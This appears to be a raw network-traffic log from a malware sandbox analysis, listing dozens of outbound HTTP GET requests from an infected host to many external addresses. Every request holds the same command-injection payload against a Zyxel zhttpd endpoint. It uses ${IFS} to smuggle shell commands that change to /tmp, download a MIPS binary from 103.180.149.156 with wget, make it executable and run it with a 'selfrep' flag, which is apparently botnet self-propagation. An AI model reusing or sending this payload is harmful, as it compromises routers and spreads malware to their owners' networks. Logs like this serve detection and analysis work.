                                            Feb 2, 2024 06:21:12.614743948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4250192.168.2.155059658.156.9.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614780903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4251192.168.2.1551624222.173.168.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614825010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4252192.168.2.1559014152.7.115.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614867926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4253192.168.2.1546874142.105.242.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614897966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4254192.168.2.1544346120.64.46.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614943027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4255192.168.2.153375214.229.2.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.614972115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4256192.168.2.153349465.230.187.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615014076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4257192.168.2.1556170136.142.248.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615067959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4258192.168.2.155803678.160.221.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615101099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4259192.168.2.1535014206.93.51.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615135908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4260192.168.2.1553366137.220.234.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615164042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4261192.168.2.1558788107.89.44.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615216017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4262192.168.2.154833292.38.101.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615248919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4263192.168.2.1535232158.177.38.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615310907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4264192.168.2.153910857.62.235.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615326881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4265192.168.2.1553080206.37.246.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615362883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4266192.168.2.153960058.129.225.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615411043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4267192.168.2.153338634.132.71.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615437984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4268192.168.2.1550916112.196.36.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615467072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4269192.168.2.154508634.198.196.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615536928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4270192.168.2.153522417.169.230.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615540028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4271192.168.2.1556038210.245.98.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615570068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4272192.168.2.1540784102.160.7.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615607023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4273192.168.2.1547050146.183.45.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615658998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4274192.168.2.1544784221.15.130.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615689039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4275192.168.2.1548216148.125.111.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615714073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4276192.168.2.1535996183.145.19.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615751982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4277192.168.2.1542456180.123.216.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615778923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4278192.168.2.1534604156.5.170.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615812063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4279192.168.2.155665057.113.248.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615916967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4280192.168.2.1559774105.39.20.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615948915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4281192.168.2.1560834153.153.162.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.615987062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4282192.168.2.1536688184.222.101.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616014004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4283192.168.2.155970698.3.158.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616060972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4284192.168.2.1547496153.85.132.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616070032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4285192.168.2.1555264133.213.142.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616113901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4286192.168.2.153742273.210.123.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616169930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4287192.168.2.153405289.152.101.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616184950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4288192.168.2.155585227.213.215.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616214991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4289192.168.2.1551964199.36.98.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616280079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4290192.168.2.1550408203.240.49.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616327047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4291192.168.2.155090275.201.92.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616353035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4292192.168.2.153543263.89.26.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616400003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4293192.168.2.1547656200.227.43.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616450071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4294192.168.2.1534188190.155.156.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616492033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4295192.168.2.1548612180.32.0.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616511106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4296192.168.2.154515685.126.159.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616564035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4297192.168.2.1560110191.237.91.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616590977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4298192.168.2.1551348167.43.168.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616621017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4299192.168.2.155971020.113.129.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616666079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4300192.168.2.1545250113.242.0.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616714954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4301192.168.2.155687472.122.241.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616780996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4302192.168.2.1549484116.135.89.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616784096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4303192.168.2.1557754189.42.242.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616823912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4304192.168.2.1560352216.229.16.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616862059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4305192.168.2.153581080.90.57.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616905928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4306192.168.2.1560858170.33.17.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616935968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4307192.168.2.155387677.112.215.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616985083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4308192.168.2.155198694.109.89.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.616995096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4309192.168.2.1548782210.7.242.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617011070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4310192.168.2.156092040.238.23.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617069006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4311192.168.2.1555112162.11.221.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617130041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4312192.168.2.156064817.61.83.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:12.617161989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4313192.168.2.1547906107.154.69.1443
                                            TimestampBytes transferredDirectionData
